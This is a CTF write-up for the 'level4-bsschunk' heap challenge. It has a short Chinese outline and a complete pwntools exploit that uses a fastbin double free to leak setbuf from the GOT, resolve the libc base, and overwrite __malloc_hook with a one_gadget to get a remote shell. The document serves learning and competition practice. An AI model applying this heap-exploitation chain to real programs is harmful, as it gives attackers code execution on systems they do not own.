
    *CTF double free & fastbin attack level4-bsschunk Writeup

    November 6, 2020 • Read: 1033 • Pwn

    一道简单的double free + fastbin attack。
    思路:
    1.利用第一次double free来修改fd为pool数组 - Offset的位置,然后修改pool数组的第一个位置为我们想要读取的位置,达到任意读取的目的。
    2.这里我们选择读取setbuf的got表,泄露setbuf的内容,然后利用泄露setbuf的地址来确定libc版本。
    3.修改__malloc_hook为one_gadget
    4.利用两次free造成异常,报错的时候会调用malloc,malloc -> __malloc_hook -> one_gadget

    from pwn import *
    from LibcSearcher import *
    #r = process('./heaplevel4-bsschunk')
    # Remote target used by the write-up; the commented-out line above is the
    # local-process variant of the same tube.
    r = remote("pwn.sixstars.team", 22504)
    # Local copy of the challenge binary; only elf.got is read from it later.
    elf = ELF('./heaplevel4-bsschunk')
    
    def add_note(data):
        """Menu choice 1: create a note whose content is *data* (sent verbatim)."""
        # Answer the menu prompt first, then the content prompt.
        exchanges = ((">> ", "1"), ("Content: ", data))
        for prompt, reply in exchanges:
            r.sendlineafter(prompt, reply)
    
    def show_note(idx):
        """Menu choice 2: ask the program to print the note at index *idx*."""
        choice, index = "2", str(idx)
        r.sendlineafter(">> ", choice)
        r.sendlineafter("id:", index)
    
    def dele_note(idx):
        """Menu choice 3: free the note at index *idx*."""
        # Same two-step prompt/reply shape as the other menu helpers.
        exchanges = ((">> ", "3"), ("id:", str(idx)))
        for prompt, reply in exchanges:
            r.sendlineafter(prompt, reply)
    
    
    # --- Stage 1: leak a libc address (write-up steps 1 and 2) ---
    # NOTE(review): the whole chain rests on the program leaving a freed pool
    # entry usable (the binary itself is not on the page, so this is inferred);
    # a program that clears its pool slot on free would not expose this.
    add_note("a")
    add_note("b")
    dele_note(0)
    dele_note(1)
    dele_note(0)          # double free of note 0 (step 1)
    # Per the write-up, fd is pointed at "pool array - offset"; 0x6020C0 is the
    # pool array address and 0x23 the offset, which the page does not derive.
    add_note(p64(0x6020C0 - 0x23))
    add_note("b")
    add_note("a")
    # This allocation overlays the pool array: pool[0] now holds setbuf@GOT (step 2).
    # The 0x13 padding comes from the chunk layout, which is not shown on the page.
    add_note('a' * 0x13 + p64(elf.got['setbuf']))
    
    show_note(0)
    # The leaked pointer is printed up to the newline; pad to 8 bytes before unpacking.
    setbuf_addr = u64(r.recvuntil('\n', drop=True).ljust(8, '\x00'))
    # LibcSearcher identifies the libc build from the leaked setbuf address (step 2).
    libc = LibcSearcher('setbuf', setbuf_addr)
    libc_base = setbuf_addr - libc.dump("setbuf")
    print hex(libc_base)   # Python 2 print statement: this script targets Python 2 pwntools
    
    # --- Stage 2: repeat the same pattern against __malloc_hook (steps 3 and 4) ---
    add_note("c")
    add_note("d")
    dele_note(2)
    dele_note(3)
    dele_note(2)          # second double free, same shape as stage 1
    # fd -> __malloc_hook - 0x23, mirroring the offset used for the pool array.
    add_note(p64(libc_base + libc.dump("__malloc_hook") - 0x23))
    add_note("b")
    add_note("a")
    # one_gadget offsets; they belong to the libc build LibcSearcher picked
    # (the page does not record which), so they are not portable to another build.
    one = [0x45216, 0x4526a, 0xf02a4, 0xf1147]
    one_addr = libc_base + one[2]
    add_note('a' * 0x13 + p64(one_addr))   # writes one_addr into __malloc_hook (step 3)
    dele_note(2)
    #gdb.attach(r)
    # Freeing the same note again triggers the allocator's error path, which
    # calls malloc and thus __malloc_hook (step 4).
    dele_note(2)
    r.interactive()
    
    